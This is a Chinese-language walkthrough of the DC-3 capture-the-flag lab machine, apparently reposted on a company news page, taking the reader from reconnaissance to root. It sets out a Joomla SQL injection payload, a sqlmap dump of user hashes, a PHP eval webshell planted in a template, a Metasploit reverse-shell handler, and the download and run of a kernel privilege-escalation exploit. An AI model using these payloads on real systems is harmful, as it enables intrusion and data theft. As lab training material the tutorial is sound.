首页/新闻资讯/正文详情

【DC系列靶机渗透】DC-3详细教程手把手带你拿到root权限

发布时间:2026/9/23 8:42:29 来源:云帆数科 栏目:资讯中心
【DC系列靶机渗透】DC-3详细教程手把手带你拿到root权限
靶机目标拿到DC-3靶机的root权限。工具39772.zip荷载压缩包kaliAntSword浏览器插件Wappalyzer环境靶机为 32位 (i686) 系统由于是太老旧的对于现在基本上都会存在兼容问题所以DC-3靶机兼容问题属于自己解决本文章只顾思路引导。核心考点Joomla 3.7.0 SQL注入、密码哈希破解、WebShell获取、Linux 32位内核提权。一信息收集1.1利用nmap找到DC-3靶机的IP靶机是布置在本地。# kali nmap -T4 192.168.182.1/24这样就可以直接找到本地靶机IP地址为192.168.182.185在你自己上IP会有所不同。分析图片可以看到开放了80端口下一步就是查看DC-3靶机的web服务。1.2.利用浏览器插件Wappalyzer利用扫描web服务器找到攻击目标joomla.分析可以看到攻击目标为内容管理系统joomlaweb服务器JS库这三个所以先测试价值最高的内容管理系统joomla不行在换成其他的。思考为什么一开始就盯着服务器系统信息看而不是去看客户端的漏洞例如web十大漏洞。为什么价值最高的是joomla的内容管理系统1.3利用kali的joomscan工具进行扫描靶机。# kali joomscan -u 192.168.182.185这样会得到了四个joomla内容管理系统下面路径里面。经过分析该分析可以直接问AI可以知道暴露了两个高价值信息1.后台管理员登录路径/administrator/index.php默认2.可以在/administrator/components中找插件漏洞http://192.168.182.185/administrator/componentshttp://192.168.182.185/administrator/moduleshttp://192.168.182.185/administrator/templateshttp://192.168.182.185/images/banners思考该如何在已有的信息中挖掘更有价值的信息呢AI会是一个很好的工具但是不仅仅只限于AI的帮助。可以拿1.4利用AI找出SQL漏洞练练自己的信息收集能力。1.4.利用/administrator/components 暴露了插件/administrator/components/com_fields中的SQL注入漏洞。利用报错注入进行验证是否具有SQL注入漏洞。# 浏览器 http://目标IP/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml(1,concat(0x7e,(select user()),0x7e),1)二利用漏洞进入后台登录2.1.利用SQLmap进行数据库泄露。# kali sqlmap -u http://192.168.182.185/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -p list[fullordering] --batch --random-agent -D joomladb -T #__users -C username,password --dump这里直接给出了整个命令。分析可以知道我们仅仅只是拿到了账号admin加盐加密密码DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu2.2利用john进行暴力破解密码。由于需要的字典是需要自己准备的如何自己准备的字典里面没有对应的密码那就自然不能爆破成功。所以直接给出作者爆破出来的密码snoopy思考什么样的字典才算是一个好的字典呢字典里面是具有固定密码习惯常用密码经典密码的一个组合嘛2.3进行连接AntSword进行文件上传。# index.php ?php eval($_POST[pass]);?找到里面一个插件 Templates: Customise (Protostar) 在里面的的一份 index.php文件中写入一句话木马。PHP的一句话木马必须要会写这个是基本素养。思考为什么选择注入一句话木马的文件名为index.php?为什么直接访问靶机就可以直接启动木马呢连接AntSword可以方便更高效进行下一步。也可以图形化查看所有文件路径。在临时目录 /tmp 上传 shell_x86.elf准备与kali的MSF进行建立会话连接。赋予文件shell_x86.elf有执行的权限。# 虚拟终端 AntSword chmod x /tmp/shell_x86.elf三权限提权root3.1在kali里面建立会话与靶机进行连接。# kali msfconsole use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost 192.168.182.149 set lport 4444 run同时在AntSword的虚拟终端中执行。# 虚拟终端 AntSword /tmp/shell_x86.elf这样就可以通过kali进行针对于靶机的攻击了。3.2利用Linux内核漏洞。# meterpreter shell uname -a exit background可以知道靶机的版本是:Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux在这里可以使用CVE-2016-5195其中的另一个版本漏洞名字为 39772。可以知道在kali里面没有39772的荷载源代码而是文件说明。思考这里除了CVE-2016-5195这个版本漏洞可以提权还可以使用那些Linux内核版本进行提权呢# kali searchsploit -x linux/local/39772.txt 2cat /usr/share/exploitdb/exploits/linux/local/39772.txt下载漏洞荷载。然后在进行解压缩获取里面的荷载文件压缩包exploit.tar(作者将解压文件放在了桌面上。)。# kali wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip sessions -i 你的会话ID将荷载文件上传到靶机上面。# meterpreter upload /home/kali/Desktop/39772/exploit.tar /tmp/exploit.tar将荷载源文件解压然后赋予执行权限。# meterpreter shell tar xvf exploit.tar cd ebpf_mapfd_doubleput_exploit chmod x compile.sh ./compile.sh #执行脚本是编译文件 chmod x doubleput ./doubleput #执行提权文件提权为root这样就可以了。最后就会有root 的权限这样就可以查看上文件 /root/the-flag.txt

相关推荐

达娜新手避坑指南:3个关键配置解决后端性能瓶颈
达娜新手避坑指南:3个关键配置解决后端性能瓶颈

达娜新手避坑指南:3个关键配置解决后端性能瓶颈 官方文档那一千多页的 PDF 翻到头都大,核心逻辑却藏在角落,这种 官方文档太长抓不住重点 的痛,谁写代码谁懂。别慌,今天这篇就是给 新手避坑 用的,直接上后端开发视角的硬核干货,不整虚的。… · 2026/9/23 8:42:29

CAD直线变多段线保姆级教程:源码级拆解与避坑指南
CAD直线变多段线保姆级教程:源码级拆解与避坑指南

CAD直线变多段线保姆级教程:源码级拆解与避坑指南 版本升级后 API 全变了?AutoCAD 2010 之后 Line 对象和 Polyline… · 2026/9/23 8:42:29

KCF目标跟踪改进:尺度池与抗遮挡的Matlab实现
KCF目标跟踪改进:尺度池与抗遮挡的Matlab实现

简介:面向计算机专业毕业设计与课程设计场景,这套基于KCF算法并融入尺度池与抗遮挡处理的目标检测跟踪MATLAB完整源码,覆盖特征提取、相关滤波、尺度估计、抗遮挡等关键环节,可直接用于算法复现、性能对比与二次开发。资源包共98个… · 2026/9/23 8:42:16

OpenClaw 多模态输出时序协调:TaoToken 统一 Key 下的生成模块编排与验证
OpenClaw 多模态输出时序协调:TaoToken 统一 Key 下的生成模块编排与验证

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/23 9:22:23

张忆芬视角下Java与Go异常处理一文搞懂
张忆芬视角下Java与Go异常处理一文搞懂

张忆芬视角下Java与Go异常处理一文搞懂 报错一堆看不懂 StackTrace?别慌,张忆芬老师常挂在嘴边的“工程化思维”今天落地到代码里。Java 的异常像堆栈里的迷宫,Go… · 2026/9/23 9:22:16

5个源码解析技巧助你搞定英语演讲面试
5个源码解析技巧助你搞定英语演讲面试

5个源码解析技巧助你搞定英语演讲面试 看了一堆教程还是不会写项目?别慌,这不仅是代码逻辑的问题,更是思维模型没打通。很多工程师在准备面试时,面对“英语演讲”这类看似非技术的问题,往往卡壳。其实, 英语演讲… · 2026/9/23 9:22:09

ChatGPT Codex 试用心得:从 dotnet 项目 PR 到 TaoToken 配置的码农助手实测
ChatGPT Codex 试用心得:从 dotnet 项目 PR 到 TaoToken 配置的码农助手实测

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/23 9:21:55

微信小程序学生托管系统开发实践与优化
微信小程序学生托管系统开发实践与优化

1. 项目背景与核心价值作为一名长期从事教育信息化系统开发的工程师,我观察到传统托管机构在学员管理、家校沟通、课程安排等方面普遍存在效率低下的问题。纸质登记易出错、家长无法实时了解孩子动态、教师排课耗时费力——这些痛点正是我们开发这套学生托管管理系统… · 2026/9/23 9:21:55

与 Trae 携手,构建 OWTB 一体化物流平台之——需求文档 V0.3 的 TaoToken 配置骨架
与 Trae 携手,构建 OWTB 一体化物流平台之——需求文档 V0.3 的 TaoToken 配置骨架

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/23 9:21:46

3招搞定手机怎么下载微信面试难题实战项目解析
3招搞定手机怎么下载微信面试难题实战项目解析

3招搞定手机怎么下载微信面试难题实战项目解析 面试被问“手机怎么下载微信”背后的原理,90%的人答不上来。别笑,这看似弱智的问题,实则是考察你对移动应用分发机制、安全校验及网络协议理解的试金石。我带过不少校招新人,他们背了八股文,却连一个A… · 2026/9/23 0:00:03

你有新短消息请注意查收:3个新手避坑指南搞定消息系统选型
你有新短消息请注意查收:3个新手避坑指南搞定消息系统选型

你有新短消息请注意查收:3个新手避坑指南搞定消息系统选型 面试被问“高并发下如何保证消息不丢失”,你张口就是“用Redis”,结果面试官追问“如果Redis宕机了怎么办”,你瞬间卡壳。这种场景太常见了,很多新手在背八股文时,只记住了技术名词… · 2026/9/23 0:00:29

Win7无线热点配置工具源码解析:解决API失效的3个实战技巧
Win7无线热点配置工具源码解析:解决API失效的3个实战技巧

Win7无线热点配置工具源码解析:解决API失效的3个实战技巧 Win7无线热点配置工具在Win10/11上跑不动?不是你的问题,是版本升级后 API 全变了。很多老项目里的 netsh wlan… · 2026/9/23 0:00:36

了解更多?预约专属演示

我们的顾问将为您一对一讲解产品与方案

企业微信二维码